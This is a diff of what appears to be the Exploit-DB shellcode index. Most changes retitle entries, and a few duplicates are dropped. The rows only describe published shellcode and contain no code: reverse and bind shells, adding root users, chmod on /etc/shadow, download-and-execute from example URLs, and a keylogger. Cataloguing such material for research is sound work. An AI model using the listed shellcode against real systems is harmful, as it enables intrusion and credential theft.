20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 17326,platforms/generator/shellcode/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",generator,shellcode,0 -17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - Reverse TCP SSL Shell (localhost:8080) Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0 +17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - Reverse TCP SSL Shell (localhost:8080/TCP) Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0 17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0 17545,platforms/win_x86/shellcode/17545.txt,"Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode,0 17559,platforms/lin_x86/shellcode/17559.c,"Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",lin_x86,shellcode,0 @@ -16205,19 +16204,19 @@ id,file,description,date,author,platform,type,port 18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH (sh4) - setuid(0); + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0 18162,platforms/linux_mips/shellcode/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 -18197,platforms/lin_x86-64/shellcode/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,lin_x86-64,shellcode,0 +18197,platforms/lin_x86-64/shellcode/18197.c,"Linux/x86-64 - execve /bin/sh Shellcode (52 bytes)",2011-12-03,X-h4ck,lin_x86-64,shellcode,0 18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - Reverse TCP Shell (0x7a69/TCP) Shellcode (168 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 18294,platforms/lin_x86/shellcode/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode",2011-12-31,pentesters.ir,lin_x86,shellcode,0 -18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 - Search For PHP/HTML Writable Files and Add Your Code Shellcode (380+ bytes)",2012-01-17,rigan,lin_x86,shellcode,0 +18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,lin_x86,shellcode,0 18585,platforms/lin_x86-64/shellcode/18585.s,"Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes)",2012-03-12,0_o,lin_x86-64,shellcode,0 -18885,platforms/lin_x86/shellcode/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,lin_x86,shellcode,0 +18885,platforms/lin_x86/shellcode/18885.c,"Linux/x86 - execve /bin/dash Shellcode (42 bytes)",2012-05-16,X-h4ck,lin_x86,shellcode,0 20196,platforms/lin_x86/shellcode/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 21252,platforms/arm/shellcode/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 21253,platforms/arm/shellcode/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 21254,platforms/arm/shellcode/21254.asm,"Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shell Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 -22489,platforms/windows/shellcode/22489.cpp,"Windows XP Professional SP3 - calc Full ROP Shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0 +22489,platforms/windows/shellcode/22489.cpp,"Windows XP Professional SP3 - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0 40890,platforms/win_x86-64/shellcode/40890.c,"Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0 24318,platforms/windows/shellcode/24318.c,"Windows - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0 @@ -16226,9 +16225,9 @@ id,file,description,date,author,platform,type,port 27132,platforms/hardware/shellcode/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0 27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind TCP Shell (4444/TCP) Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0 40827,platforms/lin_x86/shellcode/40827.c,"Linux/x86 - Egghunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",lin_x86,shellcode,0 -28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 - Multi-Egghunter Shellcode",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0 +28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP /bin/sh Shell (192.168.122.1:43981/TCP) Shellcode",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0 40334,platforms/win_x86/shellcode/40334.c,"Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 Bytes)",2016-09-05,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 -28996,platforms/windows/shellcode/28996.c,"Windows - Messagebox Null-FreeShellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",windows,shellcode,0 +28996,platforms/windows/shellcode/28996.c,"Windows - MessageBox Null-Free Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",windows,shellcode,0 29436,platforms/linux_mips/shellcode/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP /bin/sh Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",linux_mips,shellcode,0 40352,platforms/win_x86/shellcode/40352.c,"Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 Bytes)",2016-09-08,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 33836,platforms/windows/shellcode/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0 @@ -16237,7 +16236,7 @@ id,file,description,date,author,platform,type,port 34592,platforms/lin_x86/shellcode/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode,0 34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0 34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0 -35205,platforms/lin_x86-64/shellcode/35205.txt,"Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL); Position Independent Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,lin_x86-64,shellcode,0 +35205,platforms/lin_x86-64/shellcode/35205.txt,"Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL); Position Independent Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,lin_x86-64,shellcode,0 35519,platforms/lin_x86/shellcode/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,lin_x86,shellcode,0 35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 @@ -16248,11 +16247,11 @@ id,file,description,date,author,platform,type,port 36274,platforms/linux_mips/shellcode/36274.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 36276,platforms/linux_mips/shellcode/36276.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 36359,platforms/lin_x86-64/shellcode/36359.c,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0 -36391,platforms/lin_x86/shellcode/36391.c,"Linux/x86 - execve(_/bin/sh_) ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 +36391,platforms/lin_x86/shellcode/36391.c,"Linux/x86 - execve /bin/sh ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36393,platforms/lin_x86/shellcode/36393.c,"Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36394,platforms/lin_x86/shellcode/36394.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 -36395,platforms/lin_x86/shellcode/36395.c,"Linux/x86 - execve(_/bin/sh_) Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 -36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 +36395,platforms/lin_x86/shellcode/36395.c,"Linux/x86 - execve /bin/sh Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 +36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333/TCP) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - Bind TCP /bin/sh Shell (33333/TCP) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36637,platforms/lin_x86/shellcode/36637.c,"Linux/x86 - Disable ASLR Security Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",lin_x86,shellcode,0 36672,platforms/lin_x86/shellcode/36672.asm,"Linux/x86 - Egghunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0 @@ -16261,29 +16260,28 @@ id,file,description,date,author,platform,type,port 36750,platforms/lin_x86/shellcode/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",lin_x86,shellcode,0 36778,platforms/lin_x86/shellcode/36778.c,"Linux/x86 - execve /bin/sh Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode,0 36779,platforms/win_x86/shellcode/36779.c,"Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0 -36780,platforms/win_x86/shellcode/36780.c,"Windows XP SP3 x86 - Restart Computer Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0 +36780,platforms/win_x86/shellcode/36780.c,"Windows XP SP3 x86 - Restart Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0 36781,platforms/generator/shellcode/36781.py,"Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",generator,shellcode,0 -36857,platforms/lin_x86/shellcode/36857.c,"Linux/x86 - execve /bin/sh Via Push Shellcode (21 bytes)",2015-04-29,noviceflux,lin_x86,shellcode,0 +36857,platforms/lin_x86/shellcode/36857.c,"Linux/x86 - execve /bin/sh (Push Method) Shellcode (21 bytes)",2015-04-29,noviceflux,lin_x86,shellcode,0 36858,platforms/lin_x86-64/shellcode/36858.c,"Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,lin_x86-64,shellcode,0 36921,platforms/lin_x86/shellcode/36921.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",lin_x86,shellcode,0 36908,platforms/lin_x86/shellcode/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0 37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 - execve /bin/sh Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0 -37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2015-06-10,B3mB4m,lin_x86,shellcode,0 +37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh Shellcode (21 bytes) (1)",2015-06-10,B3mB4m,lin_x86,shellcode,0 37285,platforms/lin_x86/shellcode/37285.txt,"Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0 -37289,platforms/lin_x86/shellcode/37289.txt,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0 +37289,platforms/lin_x86/shellcode/37289.txt,"Linux/x86 - Shutdown(init 0) Shellcode (30 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0 37297,platforms/lin_x86/shellcode/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,lin_x86,shellcode,0 37358,platforms/lin_x86/shellcode/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 37359,platforms/lin_x86/shellcode/37359.c,"Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 -37362,platforms/lin_x86-64/shellcode/37362.c,"Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",lin_x86-64,shellcode,0 +37362,platforms/lin_x86-64/shellcode/37362.c,"Linux/x86-64 - execve /bin/sh Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",lin_x86-64,shellcode,0 37365,platforms/lin_x86/shellcode/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,lin_x86,shellcode,0 37366,platforms/lin_x86/shellcode/37366.c,"Linux/x86 - Reboot Shellcode (28 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 37384,platforms/lin_x86/shellcode/37384.c,"Linux/x86 - execve /bin/sh Shellcode (23 bytes)",2015-06-26,"Bill Borskey",lin_x86,shellcode,0 37390,platforms/lin_x86/shellcode/37390.asm,"Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 37391,platforms/lin_x86/shellcode/37391.asm,"Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 37392,platforms/lin_x86/shellcode/37392.asm,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 -37393,platforms/lin_x86/shellcode/37393.asm,"Linux/x86 - exec(_/bin/dash_) Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 +37393,platforms/lin_x86/shellcode/37393.asm,"Linux/x86 - exec /bin/dash Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 37401,platforms/lin_x86-64/shellcode/37401.asm,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",lin_x86-64,shellcode,0 -37427,platforms/lin_x86-64/shellcode/37427.txt,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-29,"Bill Borskey",lin_x86-64,shellcode,0 37495,platforms/lin_x86/shellcode/37495.py,"Linux/x86 - execve /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0 37664,platforms/win_x86/shellcode/37664.c,"Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,win_x86,shellcode,0 37749,platforms/lin_x86/shellcode/37749.c,"Linux/x86 - Egghunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode,0 @@ -16292,7 +16290,7 @@ id,file,description,date,author,platform,type,port 37895,platforms/win_x86-64/shellcode/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",win_x86-64,shellcode,0 38065,platforms/osx/shellcode/38065.txt,"OSX/x86-64 - execve /bin/sh Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0 38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z - Bind TCP Shell (12345/TCP) Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",system_z,shellcode,0 -38088,platforms/lin_x86/shellcode/38088.c,"Linux/x86 - execve(/bin/bash) Shellcode (31 bytes)",2015-09-06,"Ajith Kp",lin_x86,shellcode,0 +38088,platforms/lin_x86/shellcode/38088.c,"Linux/x86 - execve /bin/bash Shellcode (31 bytes)",2015-09-06,"Ajith Kp",lin_x86,shellcode,0 38094,platforms/generator/shellcode/38094.c,"Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator)",2015-09-07,"Ajith Kp",generator,shellcode,0 38116,platforms/lin_x86/shellcode/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",lin_x86,shellcode,0 38126,platforms/osx/shellcode/38126.c,"OSX/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0 @@ -16302,11 +16300,10 @@ id,file,description,date,author,platform,type,port 38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bind TCP /bin/sh Password (1234) Shell (31173/TCP) Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0 38708,platforms/lin_x86-64/shellcode/38708.asm,"Linux/x86-64 - Egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,lin_x86-64,shellcode,0 38815,platforms/lin_x86-64/shellcode/38815.c,"Linux/x86-64 - execve Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,lin_x86-64,shellcode,0 -38959,platforms/generator/shellcode/38959.py,"Windows XP < 10 - WinExec Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,generator,shellcode,0 +38959,platforms/generator/shellcode/38959.py,"Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,generator,shellcode,0 39149,platforms/lin_x86-64/shellcode/39149.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,lin_x86-64,shellcode,0 -39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0 39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0 -39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes)",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 +39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 39185,platforms/lin_x86-64/shellcode/39185.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0 39203,platforms/lin_x86-64/shellcode/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0 39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 @@ -16319,15 +16316,15 @@ id,file,description,date,author,platform,type,port 39389,platforms/lin_x86/shellcode/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,lin_x86,shellcode,0 39390,platforms/lin_x86-64/shellcode/39390.c,"Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0 39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Reverse TCP /bin/sh Shell (10.0.0.10:1337/TCP) Shellcode (95 bytes)",2016-02-26,Xeon,arm,shellcode,0 -39519,platforms/win_x86/shellcode/39519.c,"Windows x86 - Download File + Run via WebDAV Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win_x86,shellcode,0 +39519,platforms/win_x86/shellcode/39519.c,"Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win_x86,shellcode,0 39578,platforms/lin_x86-64/shellcode/39578.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0 -39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0 -39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0 -39625,platforms/lin_x86-64/shellcode/39625.c,"Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0 +39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86-64 - execve /bin/sh Shellcode (26 bytes)",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0 +39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0 +39625,platforms/lin_x86-64/shellcode/39625.c,"Linux/x86-64 - execve /bin/bash Shellcode (33 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0 39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0 39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0 39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0 -40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 +40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 39722,platforms/lin_x86/shellcode/39722.c,"Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 39723,platforms/lin_x86/shellcode/39723.c,"Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 39728,platforms/generator/shellcode/39728.py,"Linux/x86-64 - Bind TCP Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",generator,shellcode,0 @@ -16337,7 +16334,6 @@ id,file,description,date,author,platform,type,port 39763,platforms/lin_x86-64/shellcode/39763.c,"Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 39794,platforms/windows/shellcode/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,windows,shellcode,0 39815,platforms/generator/shellcode/39815.c,"Linux/x86 - Bind TCP /bin/sh Shell (1234/TCP) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,generator,shellcode,0 -39844,platforms/lin_x86-64/shellcode/39844.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-05-20,"Sudhanshu Chauhan",lin_x86-64,shellcode,0 39847,platforms/lin_x86-64/shellcode/39847.c,"Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0 39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 @@ -16352,7 +16348,7 @@ id,file,description,date,author,platform,type,port 40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0 40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0 40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0 -40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444) Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0 +40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444/TCP) Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0 40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,lin_x86-64,shellcode,0 40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0 